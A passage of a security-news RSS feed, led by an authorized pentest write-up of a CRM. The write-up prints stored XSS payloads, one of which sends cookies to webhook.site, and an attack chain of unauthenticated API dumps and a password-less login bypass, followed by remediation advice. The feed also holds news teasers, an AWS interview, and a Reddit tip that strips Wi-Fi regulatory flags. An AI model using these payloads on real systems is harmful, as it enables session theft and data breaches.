step.</p><p><strong>What should have happened:</strong></p><ul><li>Enforce strict schema validation (Zod or Joi) at the API handler level</li><li>Both email and password must be present, non-null, and non-empty before any database query executes</li><li>Return HTTP 400 with a generic error message for any missing authentication field</li></ul><h3>V-05 — Stored Cross-Site Scripting: Multiple Endpoints [HIGH | CVSS 8.2]</h3><p><strong>CWE-79 — Improper Neutralization of Input During Web Page Generation</strong></p><p>While reading through the database dump, I noticed something unusual in the instructor_notes and tickets tables. Some records had values that looked distinctly non-standard:</p><pre>tickets.title: "&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;<br>tickets.title: &lt;img src=x onerror="alert('XSS_SUCCESS_DASHBOARD')"&gt;</pre><pre>leads.full_name: &lt;script&gt;fetch('https://webhook.site/[REDACTED]<br>                 ?sessiya=' + btoa(document.cookie))&lt;/script&gt;</pre><pre>instructor_notes.author: &lt;details open ontoggle=alert(1)&gt; Administrator<br>instructor_notes.content: &lt;img src=x onerror="alert('Sizin sessiyanız oğurlandı: '<br>                           + document.cookie)"&gt;</pre><pre>chats.content: "&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;</pre><p>Stored XSS payloads — across four different tables. And the webhook payload in leads.full_name was actively sending base64-encoded cookie data to an external server.</p><p>I confirmed the application renders these fields without sanitization. Any authenticated user who views the Leads, Tickets, or Instructor Notes sections would execute these scripts in their browser.</p><p>The document.cookie exfiltration payload via fetch() to webhook.site means that an attacker who plants this payload in a lead record waits for an admin to open the leads page — and receives their session token automatically.</p><p><strong>What should have happened:</strong></p><ul><li>All user-supplied input must be sanitized server-side before database writes</li><li>Output must be encoded at render time — React’s default JSX escaping prevents this, but dangerouslySetInnerHTML bypasses it</li><li>A strict Content Security Policy (CSP) header blocks inline scripts and restricts fetch() destinations</li><li>Existing payload records must be purged from the database</li></ul><h3>V-06 — CORS Misconfiguration: Wildcard Origin [HIGH | CVSS 7.5]</h3><p><strong>CWE-942 — Permissive Cross-Origin Resource Sharing Policy</strong></p><p>The OPTIONS preflight response from every API endpoint returned:</p><pre>Access-Control-Allow-Origin: *<br>Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS<br>Access-Control-Allow-Headers: Content-Type, Authorization</pre><p>A wildcard Access-Control-Allow-Origin means any website on the internet can make JavaScript-initiated cross-origin requests to these endpoints and read the full responses.</p><p>Combined with V-01 (unauthenticated API access), this means a malicious website could silently harvest all CRM data from any visitor’s browser — without any user interaction other than visiting the page.</p><p><strong>What should have happened:</strong></p><ul><li>Replace * with an explicit origin allowlist</li><li>Restrict allowed methods to what each endpoint actually needs</li><li>Use Next.js middleware for CORS enforcement rather than relying solely on nginx headers</li></ul><h3>V-07 — Business Logic Flaw: Negative Payment Amounts [MEDIUM | CVSS 6.5]</h3><p><strong>CWE-840 — Business Logic Errors</strong></p><p>In the payments table, I found records with negative monetary values:</p><pre>student: [REDACTED] | amount: -99999 | invoice: INV-TEST-99999 | status: paid<br>student: [REDACTED] | amount: -3000  | invoice: HACK-999-001   | status: paid</pre><p>The invoice ID HACK-999-001 is particularly notable — it suggests this was not an accidental entry.</p><p>The API accepted these values without any server-side validation. If the application processes negative amounts as refunds or credits, an attacker could manipulate financial records or corrupt reporting.</p><p><strong>What should have happened:</strong></p><ul><li>Server-side validation rejecting any payment amount ≤ 0</li><li>Database-level constraint: CHECK (amount &gt; 0) on the payments table</li><li>Investigation and cleanup of anomalous records</li></ul><h3>V-08 — Information Disclosure: Stack &amp; Schema Details [LOW | CVSS 4.3]</h3><p><strong>CWE-200 — Exposure of Sensitive Information</strong></p><p>Several endpoints leaked technical implementation details:</p><pre>GET /api/health<br># Returns: {"status":"healthy","node_version":"v24.15.0","uptime":1.019}</pre><pre>GET /rest/v1/instructors<br># Returns: PGRST205 hint: 'Perhaps you meant public.instructor_notes'</pre><pre>GET /rest/v1/schedules<br># Returns: PGRST205 hint: 'Perhaps you meant public.schedule_events'</pre><p>The PostgREST error hints are essentially a free schema enumeration tool — they reveal exact database table names when you guess wrong. The Next.js Build ID was also embedded in every page response, enabling precise version correlation.</p><p>Low severity on its own, but useful context for a targeted attacker combining it with higher-severity findings.</p><h3>A Disturbing Discovery: Evidence of Prior Exploitation</h3><p>The most unsettling moment of the entire assessment came from reading the database carefully.</p><p>Stored inside production records — tickets, payments — were payloads that were clearly not part of the application’s legitimate data:</p><ul><li><strong>A PostgreSQL RCE attempt:</strong> COPY FROM PROGRAM syntax stored in a ticket record, suggesting at least one external actor attempted server-side command execution through the database</li><li><strong>A Go template injection payload:</strong> {{range .}}{{end}}{{template "exploit" .}} — stored in another ticket, probing for server-side template injection</li><li><strong>XSS payloads actively sending data to webhook.site</strong> — confirming that at least one external party had already planted exfiltration scripts and was receiving session cookies</li><li><strong>A Burp Suite Collaborator (oastify.com) OAST payload</strong> in the payments table — indicating active out-of-band testing by an external party</li></ul><p>This wasn’t a theoretical attack surface. Someone had already found these vulnerabilities, and they were actively using them.</p><h3>The Complete Attack Chain</h3><pre>[Attacker — No credentials, no prior knowledge]<br>        │<br>        ▼<br>[1] Passive recon → identify Next.js + Supabase stack from JS bundles<br>        │<br>        ▼<br>[2] feroxbuster → discover /api/tickets, /api/search, /api/dashboard<br>        │<br>        ▼<br>[3] curl /api/tickets (no auth) → 200 OK → V-01 confirmed<br>        │<br>        ▼<br>[4] Burp Suite intercept → extract Supabase URL + anon key from headers<br>        │<br>        ▼<br>[5] GET /rest/v1/users?select=* → 38 users, plaintext passwords, all roles<br>    GET /rest/v1/leads?select=*  → 39 lead records with PII<br>    GET /rest/v1/payments?select=* → 31 payment records<br>    ... (complete database dump — V-02, V-03)<br>        │<br>        ▼<br>[6] POST /api/login {"email": "[ANY_ADMIN_EMAIL]"} (no password) → auth bypass<br>    → SUPER_ADMIN session obtained — V-04<br>        │<br>        ▼<br>[7] Authenticated access → inject XSS payload in leads/tickets/notes<br>    → Any admin who views the record executes the payload<br>    → Session cookie exfiltrated to attacker webhook — V-05<br>        │<br>        ▼<br>[8] Full account takeover — all SUPER_ADMIN, INSTRUCTOR, SUPPORT accounts<br>    accessible. All data readable, modifiable, deletable.</pre><pre>TOTAL TIME FROM ZERO TO FULL COMPROMISE: &lt; 30 minutes</pre><h3>Remediation Roadmap</h3><p><strong>Immediate — 24 hours</strong></p><p><strong>1 · V-02 · Exposed Supabase Anon Key</strong> Rotate the Supabase anon key immediately. Enable Row Level Security on every table. Move all API keys to server-side environment variables — never in client-side JavaScript bundles.</p><p><strong>2 · V-03 · Plaintext Password Storage</strong> Hash all stored passwords using bcrypt (cost ≥ 12) or Argon2id. Force a password reset for every account. The password field must never be returned in any API response.</p><p><strong>Urgent — 72 hours</strong></p><p><strong>3 · V-01 · Unauthenticated API Access</strong> Add authentication middleware to all /api/* routes. No endpoint that returns user data should be reachable without a valid session.</p><p><strong>4 · V-04 · Authentication Bypass</strong> Enforce mandatory validation of both email and password fields at the API handler level before any database query runs. Return HTTP 400 for any missing field.</p><p><strong>High — 1 week</strong></p><p><strong>5 · V-05 · Stored XSS</strong> Sanitize all user-supplied input server-side before database writes. Implement a strict Content Security Policy header. Purge all existing XSS payload records from the database.</p><p><strong>6 · V-06 · CORS Wildcard</strong> Replace Access-Control-Allow-Origin: * with an explicit origin allowlist. Restrict allowed methods per endpoint.</p><p><strong>Medium / Low</strong></p><p><strong>7 · V-07 · Negative Payment Amounts</strong> <em>(2 weeks)</em> Validate amount &gt; 0 at the API handler level and enforce a CHECK (amount &gt; 0) constraint at the database layer.</p><p><strong>8 · V-08 · Information Disclosure</strong> <em>(1 month)</em> Restrict /api/health to internal access only. Suppress verbose PostgREST error hints in all client-facing responses.</p><h3>Key Takeaways for Developers</h3><p>The vulnerabilities found here are not exotic or theoretical. They are some of the most common and preventable mistakes in modern web application development.</p><p><strong>1. Never put secrets in client-side JavaScript.</strong> A Supabase anon key in your JavaScript bundle is a key handed to every visitor. Treat your frontend code as fully public. All API keys belong in server-side environment variables, proxied through server-side routes.</p><p><strong>2. Supabase RLS is not optional.</strong> Supabase’s Row Level Security exists precisely because the PostgREST API is designed to be called from the client. Without RLS policies, your anon key grants read access to every row in every table. Enable RLS. Add explicit policies. Deny by default.</p><p><strong>3. Validate authentication inputs on the server.</strong> Never trust that a request body contains what it should. If password is missing, return 400 immediately. Use Zod or Joi to enforce input schemas at the API handler level before any database query runs.</p><p><strong>4. Never store plaintext passwords.</strong> This should go without saying in 2026, but here we are. Use bcrypt, scrypt, or Argon2id. Never compare plaintext. Never return the password field in any API response — not even to authenticated admins.</p><p><strong>5. Sanitize all inputs, encode all outputs.</strong> If user-supplied data is rendered in a browser, it must be sanitized before storage and encoded at render time. React’s default JSX escaping helps — but only if you don’t bypass it with dangerouslySetInnerHTML.</p><p><strong>6. Monitor your own database for signs of compromise.</strong> The presence of PostgreSQL RCE attempts, template injection payloads, and active cookie-stealing XSS scripts in production data is a strong indicator of prior exploitation. Regular database audits and anomaly detection would have surfaced these earlier.</p><h3>Responsible Disclosure Timeline</h3><p><strong>April 25, 2026</strong> — Assessment conducted with full authorization <strong>April 25, 2026</strong> — Full technical report delivered to MilliSec leadership <strong>April 25, 2026</strong> — Organization notified of critical findings requiring immediate action <strong>May 2026</strong> — Write-up published after internal review and redaction</p><h3>Final Thoughts</h3><p>This was one of the most eye-opening assessments I’ve done. Not because of technical complexity — none of these vulnerabilities required advanced exploitation. The hardest part was writing a GET request with curl.</p><p>What made it sobering was the evidence that other actors had already found the same path. The database had traces of PostgreSQL RCE attempts, active XSS exfiltration, and Burp Collaborator callbacks — left by people who found this before I did and may have been quietly exfiltrating data.</p><p>The good news: every single one of these vulnerabilities is fixable. Most of them within hours. The patch for V-04 is literally one if statement. The patch for V-02 is moving a string from a .js file to a .env.local file. The barrier to fixing these is low. The cost of not fixing them is everything.</p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><p><em>All testing was conducted on an authorized target with full written permission. Never test systems you don’t own or have explicit authorization to test.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=98c030a57ab1" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain-98c030a57ab1">I Pentested a Real CRM System and Found 4 Critical Vulnerabilities — Here’s the Full Attack Chain</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is accelerating cyberattacks—here’s how to stay ahead]]></title>
<description><![CDATA[See how Microsoft unifies identity and security signals to help teams prevent, detect, and respond to AI-accelerated attacks faster. The post AI is accelerating cyberattacks—here’s how to stay ahead appeared first on Microsoft Security Blog. This article has been indexed…
Read more →
The post AI ...]]></description>
<link>https://tsecurity.de/de/3605824/it-security-nachrichten/ai-is-accelerating-cyberattacks-heres-how-to-stay-ahead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605824/it-security-nachrichten/ai-is-accelerating-cyberattacks-heres-how-to-stay-ahead/</guid>
<pubDate>Wed, 17 Jun 2026 20:38:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>See how Microsoft unifies identity and security signals to help teams prevent, detect, and respond to AI-accelerated attacks faster. The post AI is accelerating cyberattacks—here’s how to stay ahead appeared first on Microsoft Security Blog. This article has been indexed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-is-accelerating-cyberattacks-heres-how-to-stay-ahead/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-is-accelerating-cyberattacks-heres-how-to-stay-ahead/">AI is accelerating cyberattacks—here’s how to stay ahead</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[24 billion stolen records exposed online. Here’s what to do]]></title>
<description><![CDATA[Researchers found an exposed collection of 24 billion stolen records, including usernames, passwords, and other sensitive account data. This article has been indexed from Malwarebytes Read the original article: 24 billion stolen records exposed online. Here’s what to do
Read more →
The post 24 bi...]]></description>
<link>https://tsecurity.de/de/3604883/it-security-nachrichten/24-billion-stolen-records-exposed-online-heres-what-to-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604883/it-security-nachrichten/24-billion-stolen-records-exposed-online-heres-what-to-do/</guid>
<pubDate>Wed, 17 Jun 2026 15:08:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researchers found an exposed collection of 24 billion stolen records, including usernames, passwords, and other sensitive account data. This article has been indexed from Malwarebytes Read the original article: 24 billion stolen records exposed online. Here’s what to do</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/24-billion-stolen-records-exposed-online-heres-what-to-do/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/24-billion-stolen-records-exposed-online-heres-what-to-do/">24 billion stolen records exposed online. Here’s what to do</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: A look at forward-deployed engineers, AWS style]]></title>
<description><![CDATA[Hot AI companies can’t stop talking about forward-deployed engineers (FDEs), which are now very much in vogue. 



FDEs, in case you haven’t heard, are hired by companies looking (hoping?) to successfully deploy AI tools and services. It’s one of the hotter professions in a world still trying to ...]]></description>
<link>https://tsecurity.de/de/3600932/ai-nachrichten/qa-a-look-at-forward-deployed-engineers-aws-style/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600932/ai-nachrichten/qa-a-look-at-forward-deployed-engineers-aws-style/</guid>
<pubDate>Tue, 16 Jun 2026 09:18:29 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hot AI companies <a href="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html" data-type="link" data-id="https://www.computerworld.com/article/4180088/ai-vendor-fdes-key-considerations-and-concerns.html">can’t stop talking about forward-deployed engineers</a> (FDEs), which are now very much in vogue. </p>



<p>FDEs, in case you haven’t heard, are hired by companies looking (hoping?) to successfully deploy AI tools and services. It’s <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html" data-type="link" data-id="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">one of the hotter professions</a> in a world still trying to understand the impact of AI on careers.</p>



<p>So, what exactly are FDEs — are they techy lone rangers like the ones OpenAI, Google and Microsoft are hiring? Turns out it’s not so much about individual engineers who swoop in to design and roll out AI deployments; it’s more about a team of engineers working together at customer sites.</p>



<p>At least, that’s the view at Amazon Web Services (AWS).</p>



<p>In fact, according to <a href="https://www.linkedin.com/in/taimurrashid" data-type="link" data-id="https://www.linkedin.com/in/taimurrashid" target="_blank" rel="noreferrer noopener">Taimur Rashid</a>, managing director of the AWS Generative AI Innovation Center, the FDE concept pre-dates the current generative AI (genAI) gold rush. The same kinds of engineering teams were needed for the earlier machine-learning and cloud eras to help companies with deployments.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Taimur-Rashid-Director-GenAI-Innov-Delivery.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AWS's Taimur Rashid" class="wp-image-4185215" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><a href="https://www.linkedin.com/in/taimurrashid" rel="noreferrer noopener" target="_blank">Taimur Rashid</a>, managing director of the AWS Generative AI Innovation Center,</p>
</figcaption></figure><p class="imageCredit">AWS</p></div>



<p>Rashid recently talked about how AWS sees FDEs as a profession in a conversation with <em>Computerworld</em>. And he weighed in on the desired job skills the company seeks in this increasingly AI-centric era.</p>



<p><strong>What is an FDE? </strong>“We view it as a team. It’s a cross-functional team that has engineers, scientists, strategists, and folks that can piece technology and business together. In some cases, we do have to have security engineers in there, too. </p>



<p>“I see them as anesthesiologists. They have to prep so many things, monitor things throughout. We see ourselves as a frontier deployment team helping customers adopt all forms of AI, whether it’s genAI, agentic AI, even emerging trends like physical AI. We’re helping these companies become frontier themselves.”</p>



<p><strong>How does an FDE engagement begin, and how is it structured? “</strong>Where we see the forward deployed model is when customers come in — for example, we have our executive briefing center in Seattle and in Arlington, VA. When customers share what they’re trying to do, very quickly a customer’s like, “What’s the quickest way I can go and build something with you?” </p>



<p>“We’ll forward deploy our people in, we’ll embed them in your business and we’ll go through these 45-day sprints that we typically design. Through those successive sprints, we’re building stuff together, we’re proving value, and then they can expand that to a much broader engagement.</p>



<p><strong>Where do FDEs actually sit? Client side, internally, or in-between? </strong>“It’s mixed, and it largely depends on what the customer’s preference is. We’ve seen models where the customer has been very adamant that, ‘We want your teams with us in our business.’  In those cases, we forward deploy the majority of the teams on site. </p>



<p>“We have models where customers are fine with you being wherever you’re based, as long as you’re still embedded virtually. And then there’s a hybrid. We deploy anywhere from five to seven people. Sometimes, the baseline is actually three.”</p>



<p><strong>Will cost savings be the job of an FDE, or someone else on the team? “</strong>I expect these teams to be able to architect systems that have those cost requirements in mind, whether it’s use a different model for a different use case that doesn’t increase the per-token cost…or think about ways where you can use semantic caching. I personally think you may have a high spend in token consumption, but if you’re generating revenue, as long as the economics work out, then you’re at peace.”</p>



<p><strong>What challenges have you gone through deploying FDEs in the real world? </strong>“One of the challenges worth highlighting is when customers get really excited about us forward deploying resources, what they end up realizing is [that] they’re not set up to absorb that right away. They realize they have to go through … process-related things, security access — all those operational things. </p>



<p>“One very good example is the Commonwealth Bank of Australia. They said: “Prioritization’s a big thing, and if you forward deploy and you’re 100% dedicated, how do we ensure that our teams are also equally 100% dedicated?’ When you’re sitting in your office, you’re distracted by your day-to-day. So they said, ‘Why don’t we create a neutral ground in Seattle? You fly your people, we’ll fly our people. We’ll give them three weeks of dedicated time so they have no distractions.’”</p>



<p><strong>Have you gone into projects where they want AI but have no security or governance ready? “</strong>I’ve been through this before, certainly. We do see customers that have security processes and capabilities, but it’s not as tight as it should be in the age of AI. Governance is the biggest area where customers right now have the biggest gap. I’m talking governance around agents. In the past two months, almost 100% of the conversation around agents is not about capability. It’s all about governance. </p>



<p>“That is a big area right now where forward deploy teams are helping with governance education, and building the scaffolding for that.”</p>



<p><strong>How does software engineering fit into the FDE model? </strong>“One of the greatest learnings is that as we forward deploy resources and get customers to take AI and integrate it into their systems, the knowledge of software engineering is so important. Today, a customer can use one of the Claude models and scan their code base and look at vulnerabilities. </p>



<p>“The tough part is not assessing those vulnerabilities, it’s remediating [them]. Remediating [them] requires software engineering experience, because you have got to merge code, test it, deploy it. We largely see that the frontier software development teams are smaller and they’re managing agents that are doing various tasks across the software development lifecycle.”</p>



<p><strong>AWS has many models at your scale, open source, closed — it’s more complex than what other AI vendors offer.  How do you nail down the talent? </strong>“It’s massive, and when you look at not only scale, it’s the complexity of the stack. We take an approach where we fundamentally do three important things: No. 1, we want to ensure people understand concepts; they have to understand pre-training, post-training, reinforcement, fine-tuning. </p>



<p>“Secondly, we make sure that our teams are well versed in their first-party services. The third thing is that by design, AWS has always been about choice. We say, ‘Let’s do 80-20 here. What is 20% of those specialties that we need to have, which can cover 80% of what most customers are trying to do?’”</p>



<p><strong>What skills should software developers learn to move into FDE work — the top three or four things? “</strong>We look at three categories. First category is entirely functional. Are they more engineering specific? Are they science specific? Are they security specific? Our litmus test is not only knowledge of the function, but the actual hands-on work that they can do with it. Secondly is around domain. I focus on what is their domain understanding across the whole AI lifecycle? The third thing is cultural. We are looking for folks that are okay at dealing with ambiguity, being good at stakeholder management, and having that startup mindset. </p>



<p>“This AI transformation’s not for the faint of heart.”</p>



<p><strong>There’s a rush for FDEs from OpenAI, Google, and others. What’s different about what you look for? “</strong>I don’t know entirely what the others are looking for, but I’ll tell you what we have been looking for in the past. When we hired solution architects, it was about systems level understanding. But what I see more and more is hands-on experience, cultural mindset, all these things are very important. If I had to pick one thing that is going to be very important in the talent that we either upskill or future talent that we hire, it has to be the application of AI towards software engineering and system integration tasks.</p>



<p><strong>You’re upskilling AWS talent as well? “</strong>We do. You will see some publications coming out in the next couple of weeks around how do we do this across our software teams and how does that translate to customer-facing roles.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Travel Phishing and Cyber Attacks are Surging in 2026, Growing 122% over the last 3 years. Here’s What Cyber Criminals Are Actually Doing]]></title>
<description><![CDATA[Every summer, hundreds of millions of people book flights, reserve hotels, and plan vacations online. And every summer, cyber criminals show up to take advantage of exactly that. Check Point Research tracked the threat landscape heading into the 2026 summer…
Read more →
The post Travel Phishing a...]]></description>
<link>https://tsecurity.de/de/3599255/it-security-nachrichten/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599255/it-security-nachrichten/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/</guid>
<pubDate>Mon, 15 Jun 2026 15:23:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Every summer, hundreds of millions of people book flights, reserve hotels, and plan vacations online. And every summer, cyber criminals show up to take advantage of exactly that. Check Point Research tracked the threat landscape heading into the 2026 summer…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/">Travel Phishing and Cyber Attacks are Surging in 2026, Growing 122% over the last 3 years. Here’s What Cyber Criminals Are Actually Doing</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Travel Phishing and Cyber Attacks are Surging in 2026, Growing 122% over the last 3 years. Here’s What Cyber Criminals Are Actually Doing]]></title>
<description><![CDATA[Every summer, hundreds of millions of people book flights, reserve hotels, and plan vacations online. And every summer, cyber criminals show up to take advantage of exactly that. Check Point Research tracked the threat landscape heading into the 2026 summer travel season, and what they found shou...]]></description>
<link>https://tsecurity.de/de/3599202/it-security-nachrichten/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599202/it-security-nachrichten/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/</guid>
<pubDate>Mon, 15 Jun 2026 15:08:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1630" height="700" src="https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140.png 1630w, https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140-300x129.png 300w, https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140-1024x440.png 1024w, https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140-768x330.png 768w, https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140-1536x660.png 1536w, https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140-400x172.png 400w, https://blog.checkpoint.com/wp-content/uploads/2025/04/26547_Blog-banner2-e1749575337140-1320x567.png 1320w" sizes="(max-width: 1630px) 100vw, 1630px"><p>Every summer, hundreds of millions of people book flights, reserve hotels, and plan vacations online. And every summer, cyber criminals show up to take advantage of exactly that. Check Point Research tracked the threat landscape heading into the 2026 summer travel season, and what they found should give travelers pause before they click “confirm booking.”  The hospitality sector is under targeted attack  The hospitality, travel, and recreation sector recorded 2,291 average weekly cyberattacks per organization in May 2026, a 24% increase compared to the same month last year. To put that in context, the global year-over-year rise across all industries […]</p>
<p>The post <a href="https://blog.checkpoint.com/research/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/">Travel Phishing and Cyber Attacks are Surging in 2026, Growing 122% over the last 3 years. Here’s What Cyber Criminals Are Actually Doing</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fix for slow network speeds for non intel network adapters (mediatek, qualcomm, insignia etc.)]]></title>
<description><![CDATA[Im new to linux and started off with zorin OS, and everything was going (somewhat) smooth until i tried to download cs2 on steam.. I was getting 1-2mb download speeds in comparison to my usual 30 on windows, I knew I had slow 5400 rpm hard drives but i knew they werent that slow and so i spent al...]]></description>
<link>https://tsecurity.de/de/3597677/linux-tipps/fix-for-slow-network-speeds-for-non-intel-network-adapters-mediatek-qualcomm-insignia-etc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597677/linux-tipps/fix-for-slow-network-speeds-for-non-intel-network-adapters-mediatek-qualcomm-insignia-etc/</guid>
<pubDate>Mon, 15 Jun 2026 00:09:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Im new to linux and started off with zorin OS, and everything was going (somewhat) smooth until i tried to download cs2 on steam.. I was getting 1-2mb download speeds in comparison to my usual 30 on windows, I knew I had slow 5400 rpm hard drives but i knew they werent that slow and so i spent all night troubleshooting this problem, I tried everything from disabling ipv6, disabling apsm, editing steam config files, using dnsmasq (which i ended up bricking my dns settings with that which was a whole other debacle) among like atleast 5-8 other fixes that just didnt fix it. I eventually figured out the issue is that non intel wifi adapters dont have the proprietary tech that ignores no-ir flags based on your countrys regulations, linux by default has no-ir flags for 5 and 6ghz to match the strictest world regulations, so heres how to fix it (be aware of your countrys regulations, I am in the US and all these steps are legal within the US) first 'sudo nano db.txt' to open the config file with the no-ir flags, i will attach a screenshot below of what it should look like so you guys can see which lines to remove the flags and which to not (caution there is one specific line where the flag must be to comply with US regulations, however it will not bottleneck your speed if you are on 5ghz) then 'sudo apt install -y git python3' and 'python3 <a href="http://db2fw.py/">db2fw.py</a> regulatory.db db.txt' the next steps are optional but they are useful for making your changes resistant to updates and having a backup script incase of an update 'sudo chattr +i /usr/lib/firmware/regulatory.db' to make it immutable to updates, incase of an update paste the same command with a minus instead of a plus before the i, then 'sudo cp /usr/lib/firmware/regulatory.db /usr/lib/firmware/regulatory.db.bak' to save the working file as backup, then 'sudo nano /usr/local/bin/fix-wifi-regdb.sh' to create a restoration script when it opens paste this for the script '#!/bin/bash</p> <p># Unlock the file temporarily</p> <p>sudo chattr -i /usr/lib/firmware/regulatory.db</p> <p># Restore the fixed version</p> <p>sudo cp /usr/local/share/regulatory.db.fixed /usr/lib/firmware/regulatory.db</p> <p># Lock it again</p> <p>sudo chattr +i /usr/lib/firmware/regulatory.db</p> <p># Reload the driver to apply changes immediately</p> <p>sudo modprobe -r mt7921e</p> <p>sudo modprobe mt7921e</p> <p>echo "Regulatory database restored and locked." '</p> <p>after that make it executable 'sudo chmod +x /usr/local/bin/fix-wifi-regdb.sh '</p> <p>hope this saves someone time and they dont have to stay up til 4 am like i did </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/linuxhelpthrowaway09"> /u/linuxhelpthrowaway09 </a> <br> <span><a href="https://i.redd.it/ylfccnoomb7h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u5y68i/fix_for_slow_network_speeds_for_non_intel_network/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Four new Macs are launching later this year, here’s what’s coming]]></title>
<description><![CDATA[Apple launched three new Macs earlier this year, but there are another four Macs rumored to debut throughout the remainder of the year. Here’s what’s coming.]]></description>
<link>https://tsecurity.de/de/3594422/ios-mac-os/four-new-macs-are-launching-later-this-year-heres-whats-coming/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594422/ios-mac-os/four-new-macs-are-launching-later-this-year-heres-whats-coming/</guid>
<pubDate>Fri, 12 Jun 2026 21:39:33 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/03/mac-lineup-devices-apple-hello.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p class="wp-block-paragraph">Apple launched three new Macs earlier this year, but there are another four Macs <a href="https://9to5mac.com/2026/05/15/apple-will-launch-15-new-products-this-fall-heres-whats-coming/" type="post">rumored to debut</a> throughout the remainder of the year. Here’s what’s coming.</p>]]></content:encoded>
